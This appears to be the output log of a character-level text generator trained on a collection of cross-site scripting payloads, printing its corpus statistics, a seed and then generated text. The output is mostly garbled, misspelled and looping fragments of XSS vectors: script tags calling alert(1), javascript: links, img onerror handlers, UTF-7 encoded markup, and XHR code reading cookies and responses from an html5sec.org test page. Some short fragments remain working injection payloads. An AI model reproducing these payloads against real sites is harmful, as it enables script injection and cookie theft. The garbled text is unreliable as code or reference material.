[*] Total Characters: 36896
[*] Total Vocab: 116
[*] Total Patterns: 36884
[*] Seed: 'ior:url(test'

..svg)a);fill:url(#b);filtee:url(#data:image/svg+xml,%3Csvg 20xmlns%3D%22http%3A%2F%2Fwwwle%3E%3C%2Fscript%3Ealert(1)%3C/script%3E%3C/xsl:transform%versson="1</"frol="wsitet-></forl>
<utyle>*[{}@impor
t/ cols="50" rows="10"></textarea><script>ta.appendChild(clone); alert(tasult.iterateNext().data.match(/cookie = '(.*?)'/)[1]) };xhr.send();
<textarea id=ta onfocus=%22write('<script>'%2Blocation.hash
ect>
<eebe imais="aoipt(1)">
<a href="javascript:alert(1)</script>"><! foo="><script>alert(1)</script>"><! foo="><script>alert(1)</script>"><! foo="><script>alert(1)</script>"><! foo="><script>alert(1
C%2520'http%253A%252F%252Fhtml5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.substr(150,41));}</script>
x”</title><img src=xx:x onerror=alert(1)>/script>">script> document.
ipt>"><! foo="><script>alert(1)</script>"><! foo="><script>alert(1)</script>"><! foo="><script>alert(1)</script>"><! foo="><script>alert(1)</script>"><! foo="><script>alert(1)</script>"><! foo="><scri
(1)
></dire <dtr sac tooreo=alert(1)"></dire <dtr sac tooreo=alert(1)"></dire <dtr sac tooreo=alert(1)"></dire <dtr sac tooreo=alert(1)"></dire <dtr sac tooreo=alert(1)"></dire <dtr sac tooreo=alert(1
class=bar href="http://www.w3.org/1000/svg"><scth d="M0,0" style="madghroond:jrdy"><iframe srl="224<4%25 20%62%65%65%65%65%75%65%75%65%)5 %6 %6  6 <almment aateoetype="sostpe"/>
<?xml-stylesheet type=
3C/iframe%3E
<a target="x" href="xssme?xss=<script>flndtrm(  (  foerm('User cookie is ' %2B x);    else     console.log(doc); var xesult = xpe.evaaueNSReeolvart(){" {alue="anmii"    aonmole(log(doc); 
Tab;1&Tab;%29></iframe>
<iframe src="22javascript:plene(1) >a</dutton>
<mvent-socrio = function() { alert(xhr.responseText.substr(150,41));}</script>
x”</title><img src=xx:x onerror=alert(1)>/script
:Object.prototype.__defineSetter__('b',function(){aleut(1)}),x</script>;1
+ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/btmy+AD4HPA-/html+A&4-3%%2G%2C%style%3E 3Csmlle%3%35xvg:%<iva
http://www.w3.org/1000/svg"><scth d="M0,0" style="madghroond:jrdy"><iframe srl="224<4%25 20%62%65%65%65%65%75%65%75%65%)5 %6 %6  6 <almment aateoetype="sostpe"/>
<?xml-stylesheet type="text/ cols="50"
` to=`&lt;img/src=&quot;x&quot;onerror=alert(1)>/script>">script> document.getElementById(%div2").innerHTML;</script>
<script> document.getElementById(%div2").innerHTML;</script>
<script> document.get
:url(hxtp://foo.f)\20url(javascript:alert(1)</script>"><! foo="><script>alert(1)</script>"><! foo="><script>alert(1)</script>"><! foo="><script>alert(1)</script>"><! foo="><script>alert(1)</script>"><
,0" style="madghroond:jrdy"><iframe srl="224<4%25 20%62%65%65%65%65%75%65%75%65%)5 %6 %6  6 <almment aateoetype="sostpe"/>
<?xml-stylesheet type="text/ cols="50" rows="10"></textarea><script>ta.append
le=list-style:url() onerror=alert(1)>/script>">script> document.getElementById(%div2").innerHTML;</script>
<script> document.getElementById(%div2").innerHTML;</script>
<script> document.getElementById
ewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Ta
nseText.substr(150,41));}</script>
x”</title><img src=xx:x onerror=alert(1)>/script>">script> document.getElementById(%div2").innerHTML;</script>
<script> document.getElementById(%div2").innerHTML;<
2Blocation.hash)substr(1)) }</script><iframe src="22javascript:plene(1) >a</dutton>
<mvent-socrio = function() { alert(xhr.responseText.substr(150,41));}</script>
x”</title><img src=xx:x onerror=ale
   var event = doc.createEvent('MouseEvent'){};test=new+MouseEvent(){};test=new+MouseEvent(){};test=new+MouseEvent(){};test=new+MouseEvent(){};test=new+MouseEvent(){};test=new+MouseEvent(){};test=new+
0KCl9O2FsZXJ0KHh4KGV2K2JqKSk></ibrame>
<iframe src="22javascript:plene(1) >a</dutton>
<mvent-socrio = function() { alert(xhr.responseText.substr(150,41));}</script>
x”</title><img src=xx:x onerror=a
ver,= xpe.craapeNSRecolsant()823 2529%253Bffe.onreadystatechange>aunrt(1)></d>"><!-- IE 5-9 --><div id=d><x xmlns="><iframe onload=%22xrite('<script>'%2Blocation.hash)substr(1)) }</script><iframe src=
 xmlHttp.rpen('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.substr(150,41));}</script>
x”</title><img src=xx:x onerror=alert(1)>/script>">script> 
:time style=behavior:url(#default#tmm);position:absolute;" onclick="alert(1)">
<a href="javascript:alert(1)</script>"><! foo="><script>alert(1)</script>"><! foo="><script>alert(1)</script>"><! foo="><
b)/)[1])</script>
<script> document.getElementById(%div2").innerHTML;</script>
<script> document.getElementById(%div2").innerHTML;</script>
<script> document.getElementById(%div2").innerHTML;</script>
ed}</style>
<?xml-stylesheet type="text/ cols="50" rows="10"></textarea><script>ta.appendChild(clone); alert(tasult.iterateNext().data.match(/cookie = '(.*?)'/)[1]) };xhr.send();
<textarea id=ta onfoc

[*] done
